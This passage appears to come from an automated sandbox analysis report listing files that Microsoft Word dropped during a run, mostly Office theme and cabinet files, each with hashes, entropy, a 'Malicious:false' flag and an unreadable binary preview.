                                                Preview:MSCF.....R&.....D............................R&.8?..............Z..............M). .content.inf..,........M). .Main_Event.thmx......R..[...............=.1.^xa..^...../..^x....QA^"....^/.I.{/F..F..........6Vn. ..._Hmc......<....#.{.@.....Xl../Y....Ye..'V.f.S.Vf.T..0t+..y...5O...{.....-.dT...........!...[ .ns..k.....QAA.. ....B..u.`.....{.\u8.0.....@t........K....@..w.......>...-1F...........1.E....O............_M.m..CP.O......X......g......].../..:C...Q...i.._"...M..1o...S../...9....k;...}S........y..;1o....1h......t.CL.3...].@...T...4.6.}.....M...f...[.s.."f....nZ.W......0.c.{.`.^..Oo.[.JT.2].^.f..a....kO......Q..G..s.5...V.Wj.....e...I,]...SHa..U.N.N.....v.C.....x..J{.Z.t...]WN...77BO-J......g......3:i..2..EFeL.,n..t:..,~4gt.w...M.5.'h.L..#..A&.O.ys%K.Z....F.PW..=jH...jGB.i..j.J.^.#.\n...J@.....-5.f.1jZ68.o...H2.......$O...>..ld&,#$.&_....yl.fkP$.........l....s....i.tx.~<.z...>..2.Gx..B..z.E.3.N<....`$.....b..?.w.[.X..1.=q!.s......v.......r.w

                                                C:\Users\user\AppData\Local\Temp\cabFBBF.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                                Category:dropped
                                                Size (bytes):3256855
                                                Entropy (8bit):7.996842935632312
                                                Encrypted:true
                                                SSDEEP:98304:wh7I1aeH9YvgK+A+a7GiiQzP4YZDpQ2+Sd6Y:w21ay93aypQzzhpBL/
                                                MD5:8867BDF5FC754DA9DA6F5BA341334595
                                                SHA1:5067CCE84C6C682B75C1EF3DEA067A8D58D80FA9
                                                SHA-256:42323DD1D3E88C3207E16E0C95CA1048F2E4CD66183AD23B90171DA381D37B58
                                                SHA-512:93421D7FE305D27E7E2FD8521A8B328063CD22FE4DE67CCCF5D3B8F0258EF28027195C53062D179CD2EBA3A7E6F6A34A7A29297D4AF57650AA6DD19D1EF8413D
                                                Malicious:false
                                                Preview:MSCF....Gm1.....D...............cM..........Gm1..D..............o... ..........MP. .content.inf...7. ......MP. .Vapor_Trail.thmx..n...N..[......L........7...+I..x...P7/...BH..Rm.\yqi.x..B....{.m.............=.....p.%.@......BpV.[......C.4..X./..Y.'SB..........0.Gr.FG.).....R\...2..Jt..1..._.4_B..................cn7H.-.....Q...1..G{G.~.. '.$......@.(....=@=..`....@.@.A. ....'.4`. .@....D...'....S.s..9.7" /....?.aY.c.........LG....k...?_.....P.....?.1.....FB..m..t...['......:...?...W..../~..z.Tr...X.@...._....3..N..p.....b...t.....^..t...~..t.8A...t_....D..3R.Z.=..{.A.8).3-5..v.isz....0A~%.s.D.4....k.K......8......)R.}f.E..n.g&:W...'E....4%T..>......b.y..[..zI....e...j.s....F.....|7826U.C.,..BY.U.F.f......"..#.m..,..._...#.\.....gPP.2.}Kas......g..3.d0.Z.Z.]..n......MY]6.....].m..D.6...?.n.20.,.#...S...JK..#.W.%.Z4.....i..CBf...../..z......n.N...U.....8t...ny...=.!..#..SF..e...1.P..@.Qx*.f.;..t..S.>..... F..)...@.Y..5j....x....vI.mM....Z.W..77...

                                                C:\Users\user\AppData\Local\Temp\cabFD57.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):3417042
                                                Entropy (8bit):7.997652455069165
                                                Encrypted:true
                                                SSDEEP:98304:1YYkj2mRz6vkkB15AW4QD0ms+FdniD60bDUpS:qYkj7d6vP7NZDLn+PM8
                                                MD5:749C3615E54C8E6875518CFD84E5A1B2
                                                SHA1:64D51EB1156E850ECA706B00961C8B101F5AC2FC
                                                SHA-256:F2D2DF37366F8E49106980377D2448080879027C380D90D5A25DA3BDAD771F8C
                                                SHA-512:A5F591BA5C31513BD52BBFC5C6CAA79C036C7B50A55C4FDF96C84D311CCDCF1341F1665F1DA436D3744094280F98660481DCA4AA30BCEB3A7FCCB2A62412DC99
                                                Malicious:false
                                                Preview:MSCF......3.....L.............................3..?..............j.....3.....t.4.............Insight design set.dotx.................Content.inf...QJ.N..[.........R.....L....N).J|E.B.$.B).3,...n.....JW....k.U1..M...3#.5....$^.....;vR...Z.nj...#......^*......a.{..(..o.v...!L`...T.-&jZ`.\.*0.....G.."b.m..F.X......$>%..?.D..H.l.j....$.......MrQ......q-....hx...6.D.3...j....n..U#R..3....sm?..xJr..............$G8..t.g...?.g.}......$P._...7.#..w..9DR....*lu....?..'.Ai..v.vl..`......B..N_....W./.;...c=oYW.lL'bv.......+...9.P..B=...*Y.SX=EL.5o....?H.e|.Fn.M[...d.v.....i......9..U..H....uq.Nrn..@..e...3....8.....s8}z..$........B....26...d..?.l....=.aeM.[..|n....H.;..7A.`....=.F...V.Y.l..8.........%e.x0S.....~..2..%.....U..#.r_.0V.v.6w.l.......Y.........v..o+....*sn.$^'.Il...akUU....w....~.....&8.Vwj.....Q.uQ..&..G.($.2.s.?m.B.~j.*..+G.W..qi..g..5.)){O........o.ow.(;.{...y;n...J...&.F2.@.;......[{'w..........`....czW.........?W...}..w....x..........

                                                C:\Users\user\AppData\Local\Temp\~$Return.docx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):3.4450092636238514
                                                Encrypted:false
                                                SSDEEP:3:JV2N/AsilLRu63fOsFi4lYULNF2Yf:iN/Jsus2sY4CIqYf
                                                MD5:D0C08272342E93F6AD38D1671B9C9017
                                                SHA1:41AB1B2141C7B4CA34B4899DA114E52282AEF507
                                                SHA-256:CDD6C95347E311D44CB6CD06F713D1188E3E198289B66A1C14DF1B0097683569
                                                SHA-512:FABF9FB5381631A93F8295FA123F0A93E78C91801F534BD57CB2F52403D570C7A0EF058837B018F9BC527C0F3DEF2A6BA47D14DBDF16C5819C3734566704AF75
                                                Malicious:false
                                                Preview:..........................................................<...p.........%.................N...word/styles.xmlPK..........]'.W..U.=.......vv..\.G.}.tj....hSG..=2j

                                                C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):30
                                                Entropy (8bit):1.2389205950315936
                                                Encrypted:false
                                                SSDEEP:3:tPmJX:E
                                                MD5:0FA689B7E4263EE415FCA0D4545787E6
                                                SHA1:83BE1B1581588EFD6FB59B7B98D67232F1973120
                                                SHA-256:DA7051B4C5C135270ADE9794502665C891C91A19EFBC3E07DCA26F07228C7264
                                                SHA-512:B9B88CA788D9AE2BBB09C84E79BF7307BEC74D94DEB3B5D06E3FDFB35CA4820D27CCC712F366FFD5DAC979690927596CE56FD7922F239E08B87343280839C5E7
                                                Malicious:false
                                                Preview:....Z.........................

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):562113
                                                Entropy (8bit):7.67409707491542
                                                Encrypted:false
                                                SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                Malicious:false
                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):1649585
                                                Entropy (8bit):7.875240099125746
                                                Encrypted:false
                                                SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                Malicious:false
                                                Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):558035
                                                Entropy (8bit):7.696653383430889
                                                Encrypted:false
                                                SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                Malicious:false
                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):570901
                                                Entropy (8bit):7.674434888248144
                                                Encrypted:false
                                                SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                Malicious:false
                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):523048
                                                Entropy (8bit):7.715248170753013
                                                Encrypted:false
                                                SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                MD5:C276F590BB846309A5E30ADC35C502AD
                                                SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                Malicious:false
                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):3078052
                                                Entropy (8bit):7.954129852655753
                                                Encrypted:false
                                                SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                Malicious:false
                                                Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):777647
                                                Entropy (8bit):7.689662652914981
                                                Encrypted:false
                                                SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                Malicious:false
                                                Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):924687
                                                Entropy (8bit):7.824849396154325
                                                Encrypted:false
                                                SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                MD5:97EEC245165F2296139EF8D4D43BBB66
                                                SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                Malicious:false
                                                Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):966946
                                                Entropy (8bit):7.8785200658952
                                                Encrypted:false
                                                SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                Malicious:false
                                                Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):1204049
                                                Entropy (8bit):7.92476783994848
                                                Encrypted:false
                                                SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                MD5:FD5BBC58056522847B3B75750603DF0C
                                                SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                Malicious:false
                                                Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):486596
